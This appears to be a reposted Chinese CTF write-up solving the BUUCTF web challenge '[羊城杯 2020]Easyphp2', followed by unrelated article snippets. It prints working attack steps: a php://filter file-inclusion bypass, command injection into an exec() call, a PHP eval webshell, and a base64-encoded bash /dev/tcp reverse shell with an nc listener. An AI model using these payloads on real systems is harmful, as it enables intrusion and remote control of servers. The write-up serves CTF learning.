BUUCTF[web][p6][[羊城杯 2020]Easyphp2]

2023-11-01 06:30
文章标签 2020 buuctf web 羊城 p6 easyphp2

本文主要是介绍BUUCTF[web][p6][[羊城杯 2020]Easyphp2],希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

第1步,开局:

http://url/?file=GWHT.php

第2步:使用dirsearch-master扫描网站:得robots.txt

内容为:

Disallow: /?file=check.php

看样子是文件包含:

第3步,编码访问得源码[ GWHT.php check.php index.php ] ,index.php无法继续包含:

http://url/?file=php://filter/convert.%25%36%32ase64-encode/resource=GWHT.php

第4步 ,从GWHT.php得知需要exec执行,从check.php得知cookie密码PASS:

如下是check.php:

<?php
$pass = "GWHT";
// Cookie password.
echo "Here is nothing, isn't it ?";header('Location: /');

GWHT.php 的源码:

<!DOCTYPE html>
<html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="ie=edge"><title>count is here</title><style>html,body {overflow: none;max-height: 100vh;}</style>
</head><body style="height: 100vh; text-align: center; background-color: green; color: blue; display: flex; flex-direction: column; justify-content: center;"><center><img src="question.jpg" height="200" width="200" /> </center><?phpini_set('max_execution_time', 5);if ($_COOKIE['pass'] !== getenv('PASS')) {setcookie('pass', 'PASS');die('<h2>'.'<hacker>'.'<h2>'.'<br>'.'<h1>'.'404'.'<h1>'.'<br>'.'Sorry, only people from GWHT are allowed to access this website.'.'23333');}?><h1>A Counter is here, but it has someting wrong</h1><form><input type="hidden" value="GWHT.php" name="file"><textarea style="border-radius: 1rem;" type="text" name="count" rows=10 cols=50></textarea><br /><input type="submit"></form><?phpif (isset($_GET["count"])) {$count = $_GET["count"];if(preg_match('/;|base64|rot13|base32|base16|<\?php|#/i', $count)){die('hacker!');}echo "<h2>The Count is: " . exec('printf \'' . $count . '\' | wc -c') . "</h2>";}?></body></html>


第5步,写一句话木马,我使用BurpSuite v2022.1 ,发包请求关键2行如下:

GET /GWHT.php?count='56|echo+"%3C%3F%3D+eval(%5c%24_REQUEST%5B2%5D)%3F%3E"+%3Ed.php||' HTTP/1.1Cookie: pass=GWHT

这句话是为了使用exec执行:

printf ''56|echo "<?= eval($_REQUEST[2])?>" >d.php||'  | wc -c

好像不怎么完美,继续探测:

GET /GWHT.php?count=456'"`ls+-al+/|tr+'\n'+F+`"%26%26id|'id HTTP/1.1

这个就是为了看根目录的文件

语句就是:

printf '456'"`ls -al /|tr '\n' F `"&&id|'id' |wc -c

使用tr命令是为了应对exec只返回一行的问题.

第6步,使用bash反弹非交互式shell:

GET /GWHT.php?count=456'`bash+-c+"echo+KGJhc2ggJj4gL2...km|/usr/bin/bas[e]64+-d|bash"`%26%26id|'id HTTP/1.1

语句就是如下格式  ,这次去除了不必要的双引号:

printf '456'`bash -c "echo KGJhc2gg...Ckm|/usr/bin/bas[e]64 -d|bash`&&id|'id' |wc -c

攻击端需要在5步监听好端口

nc -l 7788

解释一下,上面的base64:

echo KGJhc2gg...Ckm

(bash &> /dev/tcp/xxip/xxport 0>&1 )&

反弹成功后,可以写一句话木马,虽然之前可以写(蚁剑管理也没问题)

echo '<?=eval($_REQUEST[2]);'>p.php

如下可以测试一句话木马是否工作正常:

​http://xxx.node4.buuoj.cn:81/p.php?2=print_r(123);

如下寻找,可以写的目录:

find /  -group 33  -user 33 -type  d 2>/dev/null > 1d.txt &/run/lock/apache2
/run/apache2
/var/cache/apache2/mod_cache_disk
/var/log/apache2
/var/www/html

通过读取如下文件,得到GWHT用户的hash密码,解密后得密码:GWHTCTF.

cat /GWHT/README
My password hash is 877862561ba0162ce610dd8bf90868ad414f0ec6.

使用[su - GWHT]切换用户,

此时才可以(以GWHT的身份)读flag文件

cat /GWHT/system/of/a/down/flag.txt

非预期解,我猜可以是session文件包含了:

[NPUCTF2020]ezinclude_bfengj的博客-CSDN博客  https://blog.csdn.net/rfrder/article/details/114656092

评论里有句话:

非预期解好强,5.4以上出现类似这种文件包含的情况都可以用吗

利用session.upload_progress进行文件包含和反序列化渗透 - FreeBuf网络安全行业门户  https://www.freebuf.com/vuls/202819.html

这篇关于BUUCTF[web][p6][[羊城杯 2020]Easyphp2]的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/321109

相关文章

usaco 1.3 Mixing Milk (结构体排序 qsort) and hdu 2020(sort)

到了这题学会了结构体排序 于是回去修改了 1.2 milking cows 的算法~ 结构体排序核心: 1.结构体定义 struct Milk{int price;int milks;}milk[5000]; 2.自定义的比较函数,若返回值为正,qsort 函数判定a>b ;为负,a<b;为0,a==b; int milkcmp(const void *va,c

Java Web指的是什么

Java Web指的是使用Java技术进行Web开发的一种方式。Java在Web开发领域有着广泛的应用,主要通过Java EE(Enterprise Edition)平台来实现。  主要特点和技术包括: 1. Servlets和JSP:     Servlets 是Java编写的服务器端程序,用于处理客户端请求和生成动态网页内容。     JSP(JavaServer Pages)

BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

目录   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 [web][HCTF 2018]admin 考点:弱密码字典爆破 四种方法:   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 访问环境 老规矩,我们先查看源代码

BUUCTF(34)特殊的 BASE64

使用pycharm时,如果想把代码撤销到之前的状态可以用 Ctrl+z 如果不小心撤销多了,可以用 Ctrl+Shift+Z 还原, 别傻傻的重新敲了 BUUCTF在线评测 (buuoj.cn) 查看字符串,想到base64的变表 这里用的c++的标准程序库中的string,头文件是#include<string> 这是base64的加密函数 std::string

EasyPlayer.js网页H5 Web js播放器能力合集

最近遇到一个需求,要求做一款播放器,发现能力上跟EasyPlayer.js基本一致,满足要求: 需求 功性能 分类 需求描述 功能 预览 分屏模式 单分屏(单屏/全屏) 多分屏(2*2) 多分屏(3*3) 多分屏(4*4) 播放控制 播放(单个或全部) 暂停(暂停时展示最后一帧画面) 停止(单个或全部) 声音控制(开关/音量调节) 主辅码流切换 辅助功能 屏

9.8javaweb项目总结

1.主界面用户信息显示 登录成功后,将用户信息存储在记录在 localStorage中,然后进入界面之前通过js来渲染主界面 存储用户信息 将用户信息渲染在主界面上,并且头像设置跳转,到个人资料界面 这里数据库中还没有设置相关信息 2.模糊查找 检测输入框是否有变更,有的话调用方法,进行查找 发送检测请求,然后接收的时候设置最多显示四个类似的搜索结果

JavaWeb【day09】--(Mybatis)

1. Mybatis基础操作 学习完mybatis入门后,我们继续学习mybatis基础操作。 1.1 需求 需求说明: 根据资料中提供的《tlias智能学习辅助系统》页面原型及需求,完成员工管理的需求开发。 通过分析以上的页面原型和需求,我们确定了功能列表: 查询 根据主键ID查询 条件查询 新增 更新 删除 根据主键ID删除 根据主键ID批量删除

利用Django框架快速构建Web应用:从零到上线

随着互联网的发展,Web应用的需求日益增长,而Django作为一个高级的Python Web框架,以其强大的功能和灵活的架构,成为了众多开发者的选择。本文将指导你如何从零开始使用Django框架构建一个简单的Web应用,并将其部署到线上,让世界看到你的作品。 Django简介 Django是由Adrian Holovaty和Simon Willison于2005年开发的一个开源框架,旨在简

web群集--nginx配置文件location匹配符的优先级顺序详解及验证

文章目录 前言优先级顺序优先级顺序(详解)1. 精确匹配(Exact Match)2. 正则表达式匹配(Regex Match)3. 前缀匹配(Prefix Match) 匹配规则的综合应用验证优先级 前言 location的作用 在 NGINX 中,location 指令用于定义如何处理特定的请求 URI。由于网站往往需要不同的处理方式来适应各种请求,NGINX 提供了多种匹

构建高性能WEB之HTTP首部优化

0x00 前言 在讨论浏览器优化之前,首先我们先分析下从客户端发起一个HTTP请求到用户接收到响应之间,都发生了什么?知己知彼,才能百战不殆。这也是作为一个WEB开发者,为什么一定要深入学习TCP/IP等网络知识。 0x01 到底发生什么了? 当用户发起一个HTTP请求时,首先客户端将与服务端之间建立TCP连接,成功建立连接后,服务端将对请求进行处理,并对客户端做出响应,响应内容一般包括响应